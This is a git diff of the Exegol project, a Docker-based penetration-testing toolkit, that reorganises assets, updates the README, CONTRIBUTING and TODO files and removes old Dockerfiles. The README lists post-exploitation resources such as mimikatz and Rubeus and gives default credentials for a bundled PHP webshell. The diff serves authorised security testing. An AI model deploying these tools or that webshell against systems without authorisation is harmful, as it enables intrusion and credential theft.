diff --git a/assets/PREVIEW.png b/.assets/PREVIEW.png similarity index 100% rename from assets/PREVIEW.png rename to .assets/PREVIEW.png diff --git a/assets/PREVIEW.xcf b/.assets/PREVIEW.xcf similarity index 100% rename from assets/PREVIEW.xcf rename to .assets/PREVIEW.xcf diff --git a/assets/README.png b/.assets/README.png similarity index 100% rename from assets/README.png rename to .assets/README.png diff --git a/assets/README.xcf b/.assets/README.xcf similarity index 100% rename from assets/README.xcf rename to .assets/README.xcf diff --git a/assets/example-display-sharing.gif b/.assets/example-display-sharing.gif similarity index 100% rename from assets/example-display-sharing.gif rename to .assets/example-display-sharing.gif diff --git a/.assets/exegol-help.png b/.assets/exegol-help.png new file mode 100644 index 00000000..a0f565eb Binary files /dev/null and b/.assets/exegol-help.png differ diff --git a/.assets/exegol-info.png b/.assets/exegol-info.png new file mode 100644 index 00000000..02e05bd7 Binary files /dev/null and b/.assets/exegol-info.png differ diff --git a/.assets/exegol-start.png b/.assets/exegol-start.png new file mode 100644 index 00000000..e5af1fd5 Binary files /dev/null and b/.assets/exegol-start.png differ diff --git a/assets/exegol_logo.ai b/.assets/exegol_logo.ai similarity index 100% rename from assets/exegol_logo.ai rename to .assets/exegol_logo.ai diff --git a/assets/exegol_logo.jpg b/.assets/exegol_logo.jpg similarity index 100% rename from assets/exegol_logo.jpg rename to .assets/exegol_logo.jpg diff --git a/assets/exegol_logo.png b/.assets/exegol_logo.png similarity index 100% rename from assets/exegol_logo.png rename to .assets/exegol_logo.png diff --git a/.gitignore b/.gitignore index 3cc555cf..b105634b 100644 --- a/.gitignore +++ b/.gitignore @@ -1,10 +1,111 @@ +# Byte-compiled / optimized / DLL files +__pycache__/ +*.py[cod] +*$py.class + +# C extensions +*.so + +# Distribution / packaging +.Python +env/ +build/ +develop-eggs/ 
+dist/ +downloads/ +eggs/ +.eggs/ +lib/ +lib64/ +parts/ +sdist/ +var/ +wheels/ +*.egg-info/ +.installed.cfg +*.egg + +# PyInstaller +# Usually these files are written by a python script from a template +# before PyInstaller builds the exe, so as to inject date/other infos into it. +*.manifest +*.spec + +# Installer logs +pip-log.txt +pip-delete-this-directory.txt + +# Unit test / coverage reports +htmlcov/ +.tox/ +.coverage +.coverage.* +.cache +nosetests.xml +coverage.xml +*.cover +.hypothesis/ + +# Translations +*.mo +*.pot + +# Django stuff: +*.log +local_settings.py + +# Flask stuff: +instance/ +.webassets-cache + +# Scrapy stuff: +.scrapy + +# Sphinx documentation +docs/_build/ + +# PyBuilder +target/ + +# Jupyter Notebook +.ipynb_checkpoints + +# pyenv +.python-version + +# celery beat schedule file +celerybeat-schedule + +# SageMath parsed files +*.sage.py + +# dotenv +.env + +# virtualenv +.venv +venv/ +ENV/ + +# Spyder project settings +.spyderproject +.spyproject + +# Rope project settings +.ropeproject + +# mkdocs documentation +/site + +# mypy +.mypy_cache/ + # Personal shared volume shared-data-volumes/ shared-resources/ # PyCharm and Python workspace .idea/ -venv # Build logs for debugging .build.log diff --git a/.gitmodules b/.gitmodules new file mode 100644 index 00000000..63445aa5 --- /dev/null +++ b/.gitmodules @@ -0,0 +1,8 @@ +[submodule "sources"] + path = exegol-docker-build + url = https://github.com/ShutdownRepo/Exegol-images.git + branch = main +[submodule "exegol-resources"] + path = exegol-resources + url = https://github.com/ShutdownRepo/Exegol-resources + branch = main diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md index 6bdc684e..c71583b0 100644 --- a/CONTRIBUTING.md +++ b/CONTRIBUTING.md @@ -1,29 +1,17 @@ -# General -- the `master` branch is the stable version. Please work and submit PR on the `dev` branch only. It's the most up-to-date. Once the new features are good to go, I merge the `master` and `dev` branches once in a while. 
-- `exegol.py` is the python wrapper to manage the image/container from the host -- by default, the wrappers pulls the latest DockerHub pre-built image for the install and updates -- DockerHub automatic builds are configured as follows : automatic build for each commit on the `master` branch (`latest` tag), manual builds for the `dev` branch (`dev` tag) -- if you want to locally build your image with your changes, run the wrapper with the following options: `python3 exegol.py --mode sources install`. This will operate a `git pull` in order to make sure you have the latest code base (but your local edits shouldn't be overwritten). once the `git pull` is over, the wrapper will run a `docker build` -- `sources/install.sh` is the install script ran during the build process, it installs tools, downloads resources and so on +# Wrapper & images +- the `master` branch is the stable version. Only Pull Requests are allowed on this branch. +- the `dev` branch is used for active development. This is the bleeding-edge version, but is sometimes not as stable as the `master` (depending on the development cycle). +- the `Exegol` repository includes the exegol.py wrapper code base, and features a `exegol-docker-images` submodule tracking [Exegol-images](https://github.com/ShutdownRepo/Exegol-images). +- changes to the images/dockerfiles/tools/installs must be done on the [Exegol-images](https://github.com/ShutdownRepo/Exegol-images) repo. +- by default, the wrapper pulls the latest DockerHub pre-built image for the install and updates +- DockerHub automatic builds are configured as follows + - `nightly` image is built using the base Dockerfile whenever a commit is made on [Exegol-images](https://github.com/ShutdownRepo/Exegol-images) `dev` branch. + - `full` image is built using the base Dockerfile whenever a new tag is pushed on [Exegol-images](https://github.com/ShutdownRepo/Exegol-images). 
+ - `ad`, `osint`, `web` and `light` images are built using specific Dockerfiles whenever a new tag is pushed on [Exegol-images](https://github.com/ShutdownRepo/Exegol-images). +- if you want to locally build your image with your changes, run `exegol install local`. If you have local changes to the dockerfiles, they won't be overwritten. +- any addition/question/edit/pull request to the wrapper? Feel free to raise issues on this repo, or contribute on the dev branch! +- any addition/question/edit/pull request to the docker images? GOTO [Exegol-images](https://github.com/ShutdownRepo/Exegol-images). -# Tools -- tools are installed in `/opt/tools` -- if the tools you want to add are GUI-based, you can create the install function of your tool and then call that function in `install_tools_gui()` -- if the tools you want to add are not GUI-based, you can do the install function for the tool and then call it in `install_tools()` -- make sure to start the install function with : `colorecho "[EXEGOL] Installing {name of the tool}"` -- make sure to add the tool to the list in `README_long.md` in the format : name of the tool (repo link) - -# Resources -*(e.g. a tool that cannot be used in Exegol but on the target for example, like Rubeus, mimikatz and so on)* -- resources are installed in `/opt/resources` -- just like the tools, make your install function, and then call it in `install_resources()`, start the function with the `colorecho`, report the new resource in `README_long.md` - -# Aliases -- you can set alias in the `sources/zsh/aliases` file -- aliases can point to binaries or script that are not in the path for example - -# History -- you can add history to the `sources/zsh/history` file -- the history is a helper to the users. Let's say I start to write "`secretsdump`", they'll be able to go through the commands in the history and then replace the placeholders with their values. 
I often rely on this history when I forget a tool or something, it can be helpful - -And last thing, if you want to add anything else that is not a tool, a resource, history, aliases, config or whatever, feel free to ask for it :) the idea behind Exegol is to have the perfect, community-driven, hacking environment :rocket: +Any other idea that falls outside this scope? +Any question that is left unanswered? +Feel free to reach out, I'll be happy to help and improve things, Exegol is a community-driven toolkit :rocket: diff --git a/Dockerfile b/Dockerfile deleted file mode 100644 index 1bd028dd..00000000 --- a/Dockerfile +++ /dev/null @@ -1,44 +0,0 @@ -# Author: Charlie BROMBERG (Shutdown - @_nwodtuhs) - -FROM kalilinux/kali-rolling - -ADD sources /root/sources -RUN chmod +x /root/sources/install.sh - -RUN /root/sources/install.sh install_base - -# WARNING: install_most_used_tools can't be used with other functions other than: install_base, install_resources, install_clean -# RUN /root/sources/install.sh install_most_used_tools - -# WARNING: the following installs (except: install_base, install_resources, install_clean) can't be used with install_most_used_tools -# this is a temporary limitation -RUN /root/sources/install.sh install_misc_tools -RUN /root/sources/install.sh install_wordlists_tools -RUN /root/sources/install.sh install_cracking_tools -RUN /root/sources/install.sh install_osint_tools -RUN /root/sources/install.sh install_web_tools -RUN /root/sources/install.sh install_c2_tools -RUN /root/sources/install.sh install_services_tools -RUN /root/sources/install.sh install_ad_tools -RUN /root/sources/install.sh install_mobile_tools -RUN /root/sources/install.sh install_iot_tools -RUN /root/sources/install.sh install_rfid_tools -RUN /root/sources/install.sh install_voip_tools -RUN /root/sources/install.sh install_sdr_tools -RUN /root/sources/install.sh install_network_tools -RUN /root/sources/install.sh install_wifi_tools -RUN /root/sources/install.sh 
install_forensic_tools -RUN /root/sources/install.sh install_cloud_tools -RUN /root/sources/install.sh install_steganography_tools -RUN /root/sources/install.sh install_reverse_tools -RUN /root/sources/install.sh install_crypto_tools -RUN /root/sources/install.sh install_GUI_tools -RUN /root/sources/install.sh install_code_analysis_tools - -RUN /root/sources/install.sh install_resources -RUN /root/sources/install.sh install_clean - -RUN rm -rf /root/sources - -WORKDIR /data -#CMD ["/bin/zsh"] diff --git a/README.md b/README.md index cf0afc75..76e070d3 100644 --- a/README.md +++ b/README.md @@ -1,112 +1,198 @@ -# Exegol +> **Want to quick start without reading anything else? [Click here](#-get-started)** + +# The Exegol project

DockerHub build type DockerHub build state - image size - GitHub code size in bytes - Python + image (compressed) max size
- current version + PyPi + Python latest commit on master - latest commit on dev -

+ latest commit on dev +
+ current version + current version + current version +
+

-**:bulb: TL;DR: Exegol is a community-driven hacking environment, powerful and yet simple enough to be used by anyone in day to day engagements.** +> Exegol is a community-driven hacking environment, powerful and yet simple enough to be used by anyone in day to day engagements. +> Script kiddies use Kali Linux, real pentesters use Exegol, megachads maintain it 👀 + +## Wrapper & images +Exegol is two things in one. Try it, and you'll stop using your old, unstable and risky environment, no more Kali Linux as host or single VM. +- **a python wrapper** making everyone's life easier. It handles all docker and git operations so you don't have to, and it allows for l33t hacking following best-practices. No more messed up history, libraries, and workspaces. **Now's the time to have a clean environment** with one container per engagement without the effort. Exegol handles multiple images and multiple containers. + - Want to test a new tool without risking messing up your environment? Exegol is here, pop up a new container in 5 seconds and try the tool without risk or effort + - Like the idea of using docker containers without effort but don't want to sacrifice GUI tools like BloodHound and Burp? Exegol is here, new containers are created with X11 sharing by default allowing for GUI tools to work. + - Like the idea of using docker containers but want to use USB accessories, Wi-Fi, host's network interfaces, etc.? Exegol handles all that flawlessly + - Want to stop pentesting your clients with the same environment everytime, interconnecting everything and risking being a weak link? Exegol is here, pop multiple containers without breaking a sweat and lead by example! + - You like this idea but don't want to lose your work when quitting/removing a container? Exegol shares a workspace directory per container with your host, allowing you to work knowing your progress won't be lost. 
+- a set of pre-built **docker images** and dockerfiles that include a neat choice of tools, awesome resources, custom configs and many more. + - Fed up with the instability and poor choice of tools of Kali Linux? Exegol is here, trying to correct all this by being community-driven. Want some not-so-famous tool to be added? Open an issue and let's talk about it! + - Tired of always having to open `man` or print the help for every tool because the syntax varies? Exegol includes a command history allowing you to just replace the placeholders with your values, saving you precious time + - Want to improve productivity? Exegol includes all sorts of custom configs and tweaks with ease of use and productivity in mind (colored output for Impacket, custom shortcuts and aliases, custom tool configs, ...). + - Want to build your own docker images locally? It's absolutely possible and the wrapper will help in the quest. + - Tired of always having to search github for your favorite privesc enumeration script? Exegol includes a set of resources, shared with all exegol containers and your host, including LinPEAS, WinPEAS, LinEnum, PrivescCheck, SysinternalsSuite, mimikatz, Rubeus, PowerSploit and many more. + +![info](./.assets/exegol-info.png) + +> Exegol was built with pentest engagements in mind, but it can also be used in CTFs, Bug Bounties, HackTheBox, OSCP, and so on. + +- 🔧 **Tools**: many tools that are either installed manually or with apt, pip, go etc. Some of those tools are in kali, some are not. Exegol doesn't come with only ultra-famous tools, you will find ones that the community loves to use, even if it's in dev/new/not famous. Some tools are pre-configured and/or customized (colored output, custom NtChallengeResponse in Responder, custom queries in BloodHound, ...) +- 💡 **Resources**: many resources can be useful during engagements. Those resources are not referred to as "tools" since they need to be run on a pwned target, and not on the attacker machine (e.g. 
mimikatz, rubeus, ...). +- 📜 **History**: a populated history file that allows exegol users to save time and brain space by not having to remember every tool option and argument or checking the "help" every time. +- 🚀 **Aliases**: a file containing aliases that can be handy when using manually installed tools, or doing common operations. +- 🔎 **Usage**: a powerful Python3 wrapper used to manage Exegol container and image very easily (handles every docker operation). + +## Project structure + +Below are some bullet points to better understand how Exegol works +- This repository ([Exegol](https://github.com/ShutdownRepo/Exegol)) contains the code for the Python wrapper. It's the entrypoint of the Exegol project. +- The [Exegol-images](https://github.com/ShutdownRepo/Exegol-images) repo is loaded as a submodule. It includes all necessary assets to build Docker images. +- The [Exegol-resources](https://github.com/ShutdownRepo/Exegol-resources) repo is loaded as a submodule. It includes all resources mentioned previously (LinPEAS, WinPEAS, LinEnum, PrivescCheck, SysinternalsSuite, mimikatz, Rubeus, PowerSploit and many more.). +- Getting started with the Exegol project comes down to using the wrapper, which can be installed through pip or with the sources directly (see [get started](#fast_forward-get-started)). -Exegol is a fully configured docker with many useful additional tools, resources (scripts and binaries for privesc, credential theft etc.) and some configuration (oh-my-zsh, history, aliases, colorized output for some tools). It can be used in pentest engagements, bugbounty, CTF, HackTheBox, OSCP lab & exam and so on. Exegol's original fate was to be a ready-to-hack docker in case of emergencies during engagements. +# 🚀 Get started -The main features of Exegol are: -- [:wrench: Tools](#wrench-tools): many tools that are either installed manually or with apt, pip, go etc. Some of those tools are in kali, some are not. 
Exegol doesn't come with only ultra-famous tools, you will find ones that the community loves to use, even if it's in dev/new/not famous. Some tools are pre-configured and/or customized (colored output, custom NtChallengeResponse in Responder, custom queries in BloodHound, ...) -- [:bulb: Resources](#bulb-resources): many resources can be useful during engagements. Those resources are not referred to as "tools" since they need to be run on a pwned target, and not on the attacker machine (e.g. mimikatz, rubeus, ...). -- [:scroll: History](#scroll-history): a populated history file that allows exegol users to save time and brain space by not having to remember every tool option and argument or checking the "help" every time. -- [:rocket: Aliases](#rocket-aliases): a file containing aliases that can be handful when using manually installed tools, or doing common operations. -- [:mag_right: Usage](#mag_right-usage) : a powerful Python3 wrapper used to manage Exegol container and image very easily (handles docker operations like `docker pull`, `docker build`, `docker run`, `docker start`, `docker stop`, `docker ps`, `docker rm`, `docker inspect`). +> Keep in mind that the wrapper is one thing, but in order to use Exegol, at least one Exegol docker image must be installed. +> Installing the wrapper and running it will do the next steps (which can be a bit lengthy) -Below is an example of a Zerologon attack operated with Exegol. -![Example](assets/example-zerologon.gif) +## Pre-requisites +You need git, python3 and docker, and at least 20GB of free storage. +You also need python libraries listed in [requirements.txt](./requirements.txt) (installed automatically or manually depending on the installation method you choose). 
-Below is an example of a [ACE abuse/RBCD attack](https://www.thehacker.recipes/active-directory-domain-services/movement/abusing-aces) operated with Exegol -![Example](assets/example-rbcd.gif) +## Installation using pip + +Exegol's wrapper can be installed from pip repository. That's the entrypoint of the project, you'll be able to do all the rest from there. +``` +python3 -m pip install exegol +``` + +> Remember that pip install binaries in `~/.local/bin`, which then must be in the `PATH` environment variable. + +## Installation from sources + +Exegol's wrapper can also be installed from sources. The wrapper then knows how to self-update. -# :fast_forward: Quick start -Bear in mind that the install process can be long as it downloads a ~6GB image. ``` git clone https://github.com/ShutdownRepo/Exegol cd Exegol python3 -m pip install --user --requirement requirements.txt -python3 exegol.py start ``` -Add Exegol to PATH : -``` +### Add exegol command + +
+

On Linux

+ +The exegol wrapper can then be added to the `PATH` throw symlink for direct access. + +```bash sudo ln -s $(pwd)/exegol.py /usr/local/bin/exegol ``` -# :mag_right: Usage -A powerful Python wrapper allows to manage Exegol without having to know docker-fu. +
+ +
+

On Windows (powershell)

+ +The exegol wrapper can be added as a powershell command aliases and saved for persistence +in `$HOME\PowershellAliasesExport.txt` +then load from `$PROFILE` script at powershell startup. + +```powershell +$AliasFile = "$HOME\PowershellAliasesExport.txt" +Set-Alias -Name exegol -Value "$(pwd)\exegol.py" +Get-Alias -Name "exegol" | Export-Alias -Path $AliasFile +echo "Import-Alias '$AliasFile'" >> $PROFILE +``` + +
+ +## User configuration -- Install (pull or build) an image : `exegol install` +Exegol installs and uses a yaml configuration file, located in the user's home directory: `~/.exegol` ( +or `/home//.exegol`). +The configuration file indicates paths to three host directories shared with the containers: + +- "my resources": dedicated to the user to customize his environment and tools. Defaults + to `/home//.exegol/my-resources`. +- "exegol resources": official exegol resources from + the [Exegol-resources](https://github.com/ShutdownRepo/Exegol-resources) repo. Defaults + to `/path/to/Exegol/exegol-resources`. +- "private workspace": a dedicated workspace for each container, shared with the host. Defaults + to `/home//.exegol/workspaces`. + +## Exegol images + +It is possible to install an exegol image using the wrapper with the following command: `exegol install ` + +| Image name | Description | +|------------|----------------------------------------------------------------------------------------------------| +| full | Includes all the tools supported by Exegol (warning: this is the heaviest image) | +| nightly | (for developers and advanced users) contains the latest updates. This image can be unstable! | +| ad | Includes tools for Active Directory / internal pentesting only. | +| web | Includes tools for Web pentesting only. | +| light | Includes the lightest and most used tools for various purposes. | +| osint | Includes tools for OSINT. | + +# 🔎 Usage +Below are some examples of usage. For more examples, run the following command: `exegol -h` (action: install/start/stop/etc.). 
+ +- Install an Exegol image : `exegol install` - Create/start/enter a container : `exegol start` -- Execute a specific command on a container (with stdout / stderr) : `exegol start -e bloodhound` -- Execute a specific command on a container as a daemon : `exegol exec -e bloodhound` +- Show info on containers and images : `exegol info` - Stop a container : `exegol stop` -- Remove a container or an image : `exegol remove` +- Remove a container : `exegol remove` +- Uninstall an image : `exegol uninstall` - Get help and advanced usage : `exegol --help` -![Example](assets/example-info.gif) - -By default, Exegol will start with display sharing allowing GUI-based programs to run, here is an example with BloodHound. - -![Example](assets/example-display-sharing.gif) - -# :closed_lock_with_key: Credentials -Some tools are pre-configured with the following credentials -| Element | User | Password | -| ------- | ---- | -------- | -| wso-webshell (PHP) | | exegol4thewin | -| neo4j database | neo4j | exegol4thewin | -| bettercap ui | bettercap | exegol4thewin | -| trilium | trilium | exegol4thewin | - -# :pushpin: Pre-requisites -You need python3, python3-pip, git, docker :whale:, and 15GB of free storage (*What did you expect? A fully featured pentesting environment for less than 2GB? If you've got ideas I'm all ears*). - -# :wrench: Tools -The tools installed in Exegol are mostly installed from sources in order to have the latest version when deploying Exegol. Some installs are made with go, pip, apt, gem etc. You will find most of the tools in `/opt/tools`. 
-- CrackMapExec (https://github.com/byt3bl33d3r/CrackMapExec) -- Impacket (https://github.com/SecureAuthCorp/impacket) -- BloodHound (https://github.com/BloodHoundAD/BloodHound) -- Ghidra (https://ghidra-sre.org/) -- Powershell Empire (https://github.com/BC-SECURITY/Empire) -- ffuf (https://github.com/ffuf/ffuf) -- shellerator (https://github.com/ShutdownRepo/shellerator) -- [and many others...](https://github.com/ShutdownRepo/Exegol/wiki/Tools) - -# :bulb: Resources -In addition to the many tools pre-installed and configured for some, you will find many useful pre-fetched resources like scripts and binaries in `/opt/resources`. There some pre-EoP enumeration scripts (EoP: Escalation of Privileges) and other useful binaries like Rubeus or mimikatz. -- Linux Smart Enumeration (lse.sh) (https://github.com/diego-treitos/linux-smart-enumeration) -- mimikatz (https://github.com/gentilkiwi/mimikatz) -- linPEAS & winPEAS (https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) -- sysinternals (https://docs.microsoft.com/en-us/sysinternals/downloads/) -- PowerSploit (https://github.com/PowerShellMafia/PowerSploit) -- [and many others...](https://github.com/ShutdownRepo/Exegol/wiki/Resources) - -# :scroll: History -When I hack, I often rely on my history. I don't have to remember command line options, syntax and such. This history is filled with commands that I used in engagements, bugbounties, ctf, oscp and so on. Of course, the values are placeholders that need to be changed with the appropriate ones in your context. -The history is easily usable with [oh-my-zsh](https://github.com/ohmyzsh/ohmyzsh), [zsh-autosuggestions](https://github.com/zsh-users/zsh-autosuggestions), and [fzf](https://github.com/junegunn/fzf) - -# :rocket: Aliases -Since many tools are manually installed in `/opt/tools/`, aliases could be heplful to use these without having to change directory manually. 
-Other aliases are set to save time while hacking (`http-server`, `php-server`, `urlencode`,`ipa`, ...). - -# :loudspeaker: Credits & thanks -Credits and thanks go to every infosec addicts that contribute and share but most specifically to [@th1b4ud](https://twitter.com/th1b4ud) for the base ["Kali Linux in 3 seconds with Docker"](https://thibaud-robin.fr/articles/docker-kali/). - -# :movie_camera: Introducing Exegol (in french w/ english subs) -

- -

+> ⚠️ remember that Exegol uses Docker images and containers. Understanding the difference is essential to understand Exegol. +> - **image**: think of it as an immutable template. They cannot be executed as-is and serve as input for containers. It's not possible to open a shell in an image. +> - **container**: a container rests upon an image. A container is created for a certain image at a certain time. It's possible to open a shell in a container. Careful though, once a container is created, updating the image it was created upon won't have any impact on the container. In order to enjoy the new things, a new container must be created upon that updated image. + +![help](.assets/exegol-help.png) + +By default, Exegol will create containers with display sharing allowing GUI-based programs to run, with network host sharing, and a few others things. +Below is an example of a GUI app running in an Exegol container. + +![display_sharing](.assets/example-display-sharing.gif) + +
+

Default container configuration

+ When creating a new container with `exegol start`, it gets the following configuration by default (which can be tweaked, see `exegol start -h`) + + - GUI (X11 sharing) enabled + - Host network sharing enabled (host's network interfaces are shared with the container) + - Timezone sharing enabled + - Exegol-resources sharing enabled (`/path/to/Exegol/exegol-resources` maps to `/opt/resources` in the container) + - Personal resources ("My resources") sharing enabled (`~/.exegol/my-resources` maps to `/my-resources` in the container) + - Workspace sharing enabled (`~/.exegol/workspaces/CONTAINER_NAME` maps to `/workspace` in the container) + + > Users should keep in mind that when a container is created, it's configuration cannot be modified. If you want another configuration, create another one. + + ![start_verbose](.assets/exegol-start.png) +
+ +
+

Credentials

+ Some tools are pre-configured with the following credentials + + | Element | User | Password | + | ------- | ---- | -------- | + | neo4j database | neo4j | exegol4thewin | + | bettercap ui | bettercap | exegol4thewin | + | trilium | trilium | exegol4thewin | + | wso-webshell (PHP) | | exegol4thewin | +
+ +# 👏 Credits +Credits and thanks go to every infosec addicts that contribute and share but most specifically to +- [@th1b4ud](https://twitter.com/th1b4ud) for the base ["Kali Linux in 3 seconds with Docker"](https://thibaud-robin.fr/articles/docker-kali/). +- [dramelac_](https://twitter.com/dramelac_) for working on [Exegol](https://github.com/ShutdownRepo/Exegol) (the wrapper) +- [LamaBzh](https://twitter.com/rode_tony) for working on [Exegol-images](https://github.com/ShutdownRepo/Exegol-images)** diff --git a/TODO.md b/TODO.md index 63595d74..f17d0d14 100644 --- a/TODO.md +++ b/TODO.md @@ -1,41 +1,10 @@ -# :memo: Things to start - Here are some things to do that I have in mind, I'll work on that asap. You can help if you feel like it! - - - - enable connections through SOCKS4a/5 or HTTP proxies so that all of Exegol can be used through that proxy, simulating a advanced internal offensive system (callable with a `--proxy` or `--socks` option) - - find a way to log commands and outputs for engagements: inspiration from https://github.com/TH3xACE/SCREEN_KILLER ? - - Check if the following freshly installed tools work nicely: bettercap, hostapd-wpe, iproute2 - - Tools to install: cfr, drozer, jre8-openjdk, jtool, ripgrep, revsocks, ssf, darkarmor,amber, tikitorch - - install tools for mobile applications pentest - - install https://github.com/aircrack-ng/rtl8814au - - install https://github.com/lexfo/rpc2socks - - Add precompiled binaries (i.e. sharpgpoabuse, and others) - - improve proxychains conf ? 
- - add static nmap binary install for resources - - add JSP webshell (test all https://github.com/tennc/webshell/tree/master/jsp) - - improve error handling (see https://github.com/ShutdownRepo/Exegol/issues/29) - - make the wrapper remove the container if it's unable to start - - add ssh special commands to history (socks proxy, local/remote port forwarding) - - add an option to mount an encrypted volume - - update CONTRIBUTING.md - - limits to actual packaging method - - 2 install functions can't call the same tool installation twice. It will probably cause errors - - install functions don't take into account the history or the aliases - - resources and GUI-based tools don't have package installation for now - - classify GUI tools - - add dumpert dll and exe in windows resources - - check hackrf support (wrapper + tools) - - add: uncompyle, one_gadget - - add kerbrute - - replace is and is not with == and !=, danger ahead - - populate the wiki with the --help and with GIFs - - add manspider https://github.com/blacklanternsecurity/MANSPIDER - -# Split install - split install procedures in categories so that users can tell what "parts" to install, for example : exegol install web,osint,internal - we can also work with docker image? Dunno, gonna have to work on this. - we can also do things like add layers to the existing image/container like the following : exegol update osint,web - have DockerHub build different images per metapackage, we can then docker squash or have a dockerfile build the thing nicely - -# :rocket: Things to finish - - the wiki, with videos/GIFs (https://github.com/phw/peek) ? - - the contribution rules/info for contributors (CONTRIBUTING.md) +- add `--skip-images` to update function +- improve Windows integration +- add other actions to exegol wrapper like + - backup (generic and specific modes of backuping to save valuable info before a removal like: history, home dir files, etc.) 
+ - export (allow export of exegol containers and images) + - import (allow import of exegol containers and images) +- handle encrypted volumes +- after interactive mode: show the full command for next time so that users don't always have to go through interactive mode +- add multi image selection to `exegol install` +- add templates and help for contributors: PRs and issues docs and templates, etc. \ No newline at end of file diff --git a/assets/example-info.gif b/assets/example-info.gif deleted file mode 100644 index 3a2f0155..00000000 Binary files a/assets/example-info.gif and /dev/null differ diff --git a/assets/example-rbcd.gif b/assets/example-rbcd.gif deleted file mode 100644 index e7e09f53..00000000 Binary files a/assets/example-rbcd.gif and /dev/null differ diff --git a/assets/example-zerologon.gif b/assets/example-zerologon.gif deleted file mode 100644 index 9e6ce6b4..00000000 Binary files a/assets/example-zerologon.gif and /dev/null differ diff --git a/assets/info.png b/assets/info.png deleted file mode 100644 index 02e7944f..00000000 Binary files a/assets/info.png and /dev/null differ diff --git a/dockerfiles/ad.dockerfile b/dockerfiles/ad.dockerfile deleted file mode 100644 index a6389fcf..00000000 --- a/dockerfiles/ad.dockerfile +++ /dev/null @@ -1,42 +0,0 @@ -# Author: Charlie BROMBERG (Shutdown - @_nwodtuhs) - -FROM kalilinux/kali-rolling - -ADD sources /root/sources -RUN chmod +x /root/sources/install.sh - -RUN /root/sources/install.sh install_base - -# WARNING: install_most_used_tools can't be used with other functions other than: install_base, install_resources, install_clean -#RUN /root/sources/install.sh install_most_used_tools - -# WARNING: the following installs (except: install_base, install_resources, install_clean) can't be used with install_most_used_tools -# this is a temporary limitation -RUN /root/sources/install.sh install_misc_tools -RUN /root/sources/install.sh install_wordlists_tools -# RUN /root/sources/install.sh 
install_cracking_tools -# RUN /root/sources/install.sh install_osint_tools -RUN /root/sources/install.sh install_web_tools -RUN /root/sources/install.sh install_c2_tools -RUN /root/sources/install.sh install_services_tools -RUN /root/sources/install.sh install_ad_tools -# RUN /root/sources/install.sh install_mobile_tools -# RUN /root/sources/install.sh install_iot_tools -# RUN /root/sources/install.sh install_rfid_tools -# RUN /root/sources/install.sh install_sdr_tools -RUN /root/sources/install.sh install_network_tools -# RUN /root/sources/install.sh install_wifi_tools -# RUN /root/sources/install.sh install_forensic_tools -# RUN /root/sources/install.sh install_cloud_tools -# RUN /root/sources/install.sh install_steganography_tools -# RUN /root/sources/install.sh install_reverse_tools -RUN /root/sources/install.sh install_GUI_tools -#RUN /root/sources/install.sh install_code_analysis_tools - -RUN /root/sources/install.sh install_resources -RUN /root/sources/install.sh install_clean - -RUN rm -rf /root/sources - -WORKDIR /data -#CMD ["/bin/zsh"] diff --git a/dockerfiles/light.dockerfile b/dockerfiles/light.dockerfile deleted file mode 100644 index 57cf76e6..00000000 --- a/dockerfiles/light.dockerfile +++ /dev/null @@ -1,42 +0,0 @@ -# Author: Charlie BROMBERG (Shutdown - @_nwodtuhs) - -FROM kalilinux/kali-rolling - -ADD sources /root/sources -RUN chmod +x /root/sources/install.sh - -RUN /root/sources/install.sh install_base - -# WARNING: install_most_used_tools can't be used with other functions other than: install_base, install_resources, install_clean -RUN /root/sources/install.sh install_most_used_tools - -# WARNING: the following installs (except: install_base, install_resources, install_clean) can't be used with install_most_used_tools -# this is a temporary limitation -RUN /root/sources/install.sh install_misc_tools -#RUN /root/sources/install.sh install_wordlists_tools -#RUN /root/sources/install.sh install_cracking_tools -#RUN /root/sources/install.sh 
install_osint_tools -#RUN /root/sources/install.sh install_web_tools -#RUN /root/sources/install.sh install_c2_tools -#RUN /root/sources/install.sh install_services_tools -#RUN /root/sources/install.sh install_ad_tools -#RUN /root/sources/install.sh install_mobile_tools -#RUN /root/sources/install.sh install_iot_tools -#RUN /root/sources/install.sh install_rfid_tools -#RUN /root/sources/install.sh install_sdr_tools -#RUN /root/sources/install.sh install_network_tools -#RUN /root/sources/install.sh install_wifi_tools -#RUN /root/sources/install.sh install_forensic_tools -#RUN /root/sources/install.sh install_cloud_tools -#RUN /root/sources/install.sh install_steganography_tools -#RUN /root/sources/install.sh install_reverse_tools -#RUN /root/sources/install.sh install_GUI_tools -#RUN /root/sources/install.sh install_code_analysis_tools - -RUN /root/sources/install.sh install_resources -RUN /root/sources/install.sh install_clean - -RUN rm -rf /root/sources - -WORKDIR /data -#CMD ["/bin/zsh"] diff --git a/dockerfiles/osint.dockerfile b/dockerfiles/osint.dockerfile deleted file mode 100644 index 8712cfba..00000000 --- a/dockerfiles/osint.dockerfile +++ /dev/null @@ -1,42 +0,0 @@ -# Author: Charlie BROMBERG (Shutdown - @_nwodtuhs) - -FROM kalilinux/kali-rolling - -ADD sources /root/sources -RUN chmod +x /root/sources/install.sh - -RUN /root/sources/install.sh install_base - -# WARNING: install_most_used_tools can't be used with other functions other than: install_base, install_resources, install_clean -#RUN /root/sources/install.sh install_most_used_tools - -# WARNING: the following installs (except: install_base, install_resources, install_clean) can't be used with install_most_used_tools -# this is a temporary limitation -RUN /root/sources/install.sh install_misc_tools -#RUN /root/sources/install.sh install_wordlists_tools -#RUN /root/sources/install.sh install_cracking_tools -RUN /root/sources/install.sh install_osint_tools -#RUN /root/sources/install.sh 
